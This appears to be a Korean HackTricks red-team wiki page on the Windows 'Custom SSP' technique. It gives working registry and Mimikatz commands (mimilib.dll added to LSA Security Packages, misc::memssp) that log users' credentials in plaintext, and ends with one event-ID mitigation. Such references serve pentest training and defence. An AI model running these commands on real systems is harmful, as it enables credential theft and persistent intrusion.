Custom SSP
Tip
AWS Hacking을 배우고 연습하세요:
HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking을 배우고 연습하세요:HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking을 배우고 연습하세요:HackTricks Training Azure Red Team Expert (AzRTE)
평가 트랙 (ARTA/GRTA/AzRTA)과 Linux Hacking Expert (LHE)를 보려면 전체 HackTricks Training 카탈로그를 둘러보세요.
HackTricks 지원하기
- subscription plans를 확인하세요!
- 💬 Discord group, telegram group에 참여하고, X/Twitter에서 @hacktricks_live를 팔로우하거나, LinkedIn page와 YouTube channel을 확인하세요.
- HackTricks 및 HackTricks Cloud github repos에 PR을 제출해 hacking tricks를 공유하세요.
Custom SSP
SSP(보안 지원 공급자)가 무엇인지 여기에서 알아보세요.
자신의 SSP를 생성하여 명확한 텍스트로 자격 증명을 캡처할 수 있습니다.
Mimilib
Mimikatz에서 제공하는 mimilib.dll 바이너리를 사용할 수 있습니다. 이것은 모든 자격 증명을 명확한 텍스트로 파일에 기록합니다.
dll을 C:\Windows\System32\에 배치하세요.
기존 LSA 보안 패키지 목록을 가져옵니다:
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
mimilib.dll를 보안 지원 공급자 목록(보안 패키지)에 추가합니다:
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
재부팅 후 모든 자격 증명은 C:\Windows\System32\kiwissp.log에 평문으로 저장됩니다.
메모리 내
Mimikatz를 사용하여 메모리에 직접 주입할 수도 있습니다(약간 불안정하거나 작동하지 않을 수 있습니다).
privilege::debug
misc::memssp
이것은 재부팅 시 유지되지 않습니다.
완화
이벤트 ID 4657 - HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages의 감사 생성/변경
Tip
AWS Hacking을 배우고 연습하세요:
HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking을 배우고 연습하세요:HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking을 배우고 연습하세요:HackTricks Training Azure Red Team Expert (AzRTE)
평가 트랙 (ARTA/GRTA/AzRTA)과 Linux Hacking Expert (LHE)를 보려면 전체 HackTricks Training 카탈로그를 둘러보세요.
HackTricks 지원하기
- subscription plans를 확인하세요!
- 💬 Discord group, telegram group에 참여하고, X/Twitter에서 @hacktricks_live를 팔로우하거나, LinkedIn page와 YouTube channel을 확인하세요.
- HackTricks 및 HackTricks Cloud github repos에 PR을 제출해 hacking tricks를 공유하세요.


